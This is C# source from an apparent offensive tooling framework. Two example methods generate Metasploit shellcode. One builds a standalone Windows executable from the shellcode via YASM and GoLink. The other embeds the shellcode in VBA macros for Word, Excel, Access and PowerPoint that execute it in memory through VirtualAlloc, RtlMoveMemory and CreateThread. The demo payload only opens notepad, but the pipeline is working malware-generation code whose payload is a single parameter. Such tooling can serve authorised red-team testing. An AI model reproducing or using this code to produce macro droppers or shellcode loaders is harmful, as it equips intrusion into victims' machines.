// Assembly Example with shellcode using Yasm + GoLink private static IAttack AssemblyShellcodeYasmGoLinkExample() { var samplesOutput = new SamplesOutput(); var attackName = "AssemblyShellcodeYasmGoLink"; var attack = new Attack(new IOutput[] { samplesOutput, }, name: attackName); // Metasploit payloads can be easily generated var shellcodeBytes = MetasploitPayloadFactory.Generate(format: "raw", payload: "windows/x64/exec", options: "EXITFUNC=thread CMD=notepad"); // They'll need to be wrapped in the appropriate Class. var shellcode = new ShellcodeX64(shellcodeBytes); // This is YASM Assembly Langauge that includes the shellcode instructions as-is var rawShellcodeAsm = new RawShellcodeYasmAssemblySource( shellcode, symbolName: "SheSellsShellCodesByTheSilkRoad", // A label for the start of the shellcode. Can be called like a function from C sectionWritable: true // Some shellcode needs to be in a memory page that has RWX permissions. This not one of them, but lets give the section Write permissions anyways ); var staticLibrary = ((IAssembler <YASM, Win64ObjectFile>) new MyWarez.Plugins.Yasm.Yasm()).Assemble(rawShellcodeAsm); var entryPoint = ((ICFunction)rawShellcodeAsm).Name; var linkerConfig = new MyWarez.Plugins.GoDevTool.Linker.Config(ENTRY: entryPoint); var createProcessExe = ((ILinker <Win64ObjectFile, Executable>) new MyWarez.Plugins.GoDevTool.Linker(linkerConfig)).Link(staticLibrary); samplesOutput.Add("AssemblyShellcodeYasmGoLinkNotepad.exe", createProcessExe); // Double click to confirm that notepad spawns // Note: Linking with MSVC instead of GoLink would also be an option attack.Generate(); return(attack); }
// Office VBAMacro Example private static IAttack OfficeVbaMacroExample() { var samplesOutput = new SamplesOutput(); var attackName = "OfficeVbaMacro"; var attack = new Attack(new IOutput[] { samplesOutput, }, name: attackName); var shellcodeBytes = MetasploitPayloadFactory.Generate(format: "raw", payload: "windows/exec", options: "EXITFUNC=thread CMD=notepad"); // Most installs of Microsft Office are 32 bit var shellcode = new ShellcodeX86(shellcodeBytes); // VbaMacro that uses VirtualAlloc + RtlMoveMemory + CreateThread to execute shellcode var vbaMacro = new ShellcodeVbaMacro(shellcode); var wordVbaMacro = new WordVBAMacro(vbaMacro); var wordVbaMacroFilename = "WordVbaMacro" + "." + wordVbaMacro.Extension; samplesOutput.Add(wordVbaMacroFilename, wordVbaMacro); var excelVbaMacro = new ExcelVBAMacro(vbaMacro); var excelVbaMacroFilename = "ExcelVbaMacro" + "." + excelVbaMacro.Extension; samplesOutput.Add(excelVbaMacroFilename, excelVbaMacro); var accessVbaMacro = new AccessVBAMacro(vbaMacro); var accessVbaMacroFilename = "AccessVbaMacro" + "." + accessVbaMacro.Extension; samplesOutput.Add(accessVbaMacroFilename, accessVbaMacro); var powerPointVbaMacro = new PowerPointVBAMacro(vbaMacro); var powerPointVbaMacroFilename = "PowerPointVbaMacro" + "." + powerPointVbaMacro.Extension; samplesOutput.Add(powerPointVbaMacroFilename, powerPointVbaMacro); attack.Generate(); return(attack); }